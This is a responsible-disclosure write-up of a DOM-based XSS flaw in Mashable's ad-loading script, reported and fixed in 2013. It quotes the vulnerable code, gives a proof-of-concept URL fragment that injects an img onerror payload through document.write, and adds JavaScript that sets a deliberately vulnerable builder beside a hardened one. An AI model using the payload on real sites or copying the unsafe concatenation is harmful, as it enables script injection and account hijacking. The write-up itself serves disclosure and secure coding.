Vulnerable code was:
(...) The source location.hash was not properly sanitized, so it could be used to inject an XSS vector into the browser DOM through the document.write sink.
var customOpts = optsFromUrl(window.location.hash);
(...)
src = appendKeyVal(src, 'ord', opts.options);
(...)
buffer += '<script class="ad_call" src="' + src + '"><\/script>';
(...)
document.write(buffer);
(...)
Proof-of-concept:
http://mashable.com/#type=left_column&ord=499753815940197_"><img src=x onerror=prompt(1);>&tile=1&sec0=home&sec1=index&escnotcategory=iframe&bg=#39ebd1&adnum=1
This type of attack could be used to trick innocent users, infect them with malware, and even hijack their accounts.
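The vulnerable pattern from the excerpt next to a hardened rewrite, as an added example that is not Mashable's or the ad loader's code: the names optsFromUrl and appendKeyVal come from the snippet above, their bodies, the base URL and the assumption that ord is a numeric cache-buster are mine.

```javascript
// Added example, not the original ad-loader code. Runs under Node; no DOM needed.
const BASE = 'http://ads.example.invalid/adj/';   // assumed ad-server base URL

// Proof-of-concept fragment from the post, used here as test input.
const POC_HASH = '#type=left_column&ord=499753815940197_"><img src=x onerror=prompt(1);>&tile=1';

// Parse "#k=v&k2=v2" into an object (assumed to match what optsFromUrl did).
function optsFromUrl(hash) {
  const opts = {};
  for (const pair of hash.replace(/^#/, '').split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? '' : pair.slice(i + 1);
    try { opts[decodeURIComponent(k)] = decodeURIComponent(v); }
    catch (e) { /* malformed %-escape: drop the pair */ }
  }
  return opts;
}

// VULNERABLE: raw concatenation of an attacker-controlled value into markup.
function appendKeyValRaw(src, key, val) {
  return src + ';' + key + '=' + val;
}
function buildAdCallVulnerable(hash) {
  const src = appendKeyValRaw(BASE, 'ord', optsFromUrl(hash).ord);
  return '<script class="ad_call" src="' + src + '"><\/script>';   // fed to document.write
}

// HARDENED: allow-list the value's shape, percent-encode it, never build HTML text.
const ALLOWED = { ord: /^[0-9]{1,20}$/ };   // assumed: cache-buster is a plain integer
function appendKeyValSafe(src, key, val) {
  if (!ALLOWED[key] || typeof val !== 'string' || !ALLOWED[key].test(val)) return null;
  return src + ';' + key + '=' + encodeURIComponent(val);
}
function buildAdCallSafe(hash) {
  return appendKeyValSafe(BASE, 'ord', optsFromUrl(hash).ord);   // URL or null if rejected
}

// Insert via the DOM API instead of document.write: src is an attribute value, not markup.
function insertAdScript(doc, src) {
  if (src === null) return false;
  const s = doc.createElement('script');
  s.className = 'ad_call';
  s.src = src;
  doc.head.appendChild(s);
  return true;
}
```

With the PoC fragment, buildAdCallVulnerable returns markup containing the injected img tag, while buildAdCallSafe returns null and nothing is inserted.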
Timeline:
22 Aug 2013: Reported to Mashable
26 Aug 2013: Mashable replied that they would fix it
29 Aug 2013: Fix is released
03 Sep 2013: Full disclosure